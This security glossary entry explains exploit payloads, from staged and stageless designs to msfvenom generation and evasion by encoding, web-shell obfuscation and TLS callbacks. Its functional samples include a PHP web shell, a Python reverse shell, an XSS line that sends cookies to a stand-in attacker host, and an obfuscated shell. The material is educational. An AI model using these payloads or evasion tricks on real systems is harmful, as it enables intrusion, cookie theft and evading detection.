Security Glossary

Exploit Payload

The code or data delivered by an exploit to achieve objectives like spawning shells, establishing backdoors, or exfiltrating data.

Exploit Payload is the code or data delivered by an exploit to achieve the attacker's objective, such as spawning a shell, establishing a backdoor, or exfiltrating data.

Payload Types

Staged vs Stageless

# Stageless: Complete payload in single delivery
# Larger size, but single request

# Staged: Small loader fetches main payload
# Stage 1: Connect back, download stage 2
# Stage 2: Full functionality (meterpreter, shell)

Common Payload Goals

  • Reverse shell: Connect back to attacker
  • Bind shell: Open port on victim
  • Meterpreter: Advanced post-exploitation
  • Command execution: Run specific commands
  • File download: Retrieve data

Web Payload Examples

# PHP web shell
<?php system($_GET['cmd']); ?>

# Python reverse shell
import socket,subprocess,os
s=socket.socket()
s.connect(("attacker",4444))
os.dup2(s.fileno(),0)
subprocess.call(["/bin/sh","-i"])

# JavaScript XSS payload
<script>
fetch('https://attacker/steal?c='+document.cookie)
</script>

Payload Generation

# Metasploit msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf

# Web shells
weevely generate password shell.php

Payload-Specific Evasion

Bad Characters and Encoders (native payloads)

A memory-corruption payload often travels through a parser that eats certain bytes: a string copy stops at a null (\x00), a line reader breaks on \x0a/\x0d, an HTTP field drops \x20. Those are the payload's bad characters. msfvenom encodes the shellcode so the final bytes avoid them and self-decode at runtime.

# Avoid null, CR, LF; encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.0.0.1 LPORT=443 \
  -b '\x00\x0a\x0d' -e x64/shikata_ga_nai -f c

Encoding changes the byte pattern, so it also shifts a signature-based scanner off the known stub, though modern engines flag the decoder itself.

Web-Shell Obfuscation and Polymorphism

A static web shell like <?php system($_GET['cmd']); ?> matches trivially on the string system. Obfuscation hides the sink behind dynamic names and encoding, and polymorphic generators emit a different-looking file each time:

<?php $f = $_GET['a']; $x = base64_decode('c3lzdGVt'); $x($f); ?>
// 'system' never appears as a literal; callable is built at runtime

Staged vs Stageless Callbacks over TLS

A stageless payload carries full functionality in one blob (larger, but one round trip). A staged payload sends a tiny loader that pulls the real stage from the handler, keeping the initial delivery small enough to fit a constrained injection point. Running the callback over TLS (reverse_https) wraps the traffic in a normal-looking encrypted session so network inspection sees a TLS flow, not shellcode, and certificate pinning on the handler resists interception.

# Staged, TLS-backed callback
msfvenom -p windows/x64/meterpreter/reverse_https ...   # staged
# vs stageless single blob
msfvenom -p windows/x64/meterpreter_reverse_https ...    # stageless

See Also